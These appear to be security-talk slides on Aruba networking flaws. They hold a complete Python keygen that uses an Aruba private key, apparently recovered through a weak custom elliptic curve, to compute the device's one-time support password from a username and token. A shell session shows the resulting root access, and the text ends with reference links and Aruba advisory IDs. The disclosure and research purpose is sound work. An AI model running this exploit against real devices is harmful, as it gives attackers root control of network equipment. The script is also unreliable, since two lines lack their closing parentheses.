Another reason to not use your own curve!
P-H via Sage’s discrete_log() method
```
# python support-access.py asdf C269-27A8-29BD-8246 | tail -n 1
Password: aed0202c0cfee30c
```

```
38:17:c3: [red]# support
Username (Please enter with @domain.com, in lowercase): asdf

Token: [green]C269-27A8-29BD-8246
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password: [red]aed0202c0cfee30c
Switching to Full Access
~ # uname -a
~ # id
/bin/sh: id: not found
~ # whoami
root
~ #
```
#!/usr/bin/env python3
#pip requirements: tinyec, nummaster

from tinyec import registry, ec
import binascii, hmac, hashlib, sys
from nummaster.basic import sqrtmod

if len(sys.argv) != 3:
    print("Usage: support-access.py <username> <token>"
    sys.exit()

username = sys.argv[1].strip()
imp = sys.argv[2].replace("-","

def uncompress_key(p, a, b, x):
    y = sqrtmod(pow(x, 3, p) + a * x + b, p)
    if bool(y & 1):
        return (x, y)
    return (x, p - y)

def calc_pass(shared_secret, username):
    raw = binascii.unhexlify(shared_secret)
    key = binascii.unhexlify("00"*20)
    raw_dg = hmac.new(key, raw, hashlib.sha1).digest()
    h2 = hmac.new(raw_dg, username.encode(), hashlib.sha1)
    hmac_out = binascii.hexlify(h2.digest())
    print("Password: " + hmac_out[0:16].decode())

basepoint = int("BB3C71C351AAE96B", 16), int("830B4345D75E9275", 16)
p = int("FE4382C5413A02FF", 16)
order = 18321631499947426219
field = ec.SubGroup(p, basepoint, order, 1)
a = int("5BA3091245C856AB", 16)
b = int("C2AB76EF7FE1D7F2", 16)
curve = ec.Curve(a, b, field)
arubaPrivKey = 2826820123527714983
arubaPubKey = arubaPrivKey * curve.g

ux = int(imp.encode(),16)
uy = uncompress_key(p, a, b, ux)[1]
user_pub = ec.Point(curve,ux,uy)
SharedKey = arubaPrivKey * user_pub
sk = hex(SharedKey.x)[2:]

if len(sk) % 2 != 0:
    sk = "0" + sk

calc_pass(sk, username)
Misc Ref

https://cryptobook.nakov.com/asymmetric-key-ciphers/elliptic-curve-cryptography-ecc

https://blog.trailofbits.com/2019/07/08/fuck-rsa/

https://github.com/qubd/mini_ecdsa

https://blog.trailofbits.com/2019/07/08/fuck-rsa/

https://github.com/mtrimoska/PCS


https://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
Misc Ref

Aruba advisories for the vulns in this talk

ARUBA-PSA-2021-007
ARUBA-PSA-2021-004
ARUBA-PSA-2021-018
ARUBA-PSA-2022-007
ARUBA-PSA-2021-010
ARUBA-PSA-2021-001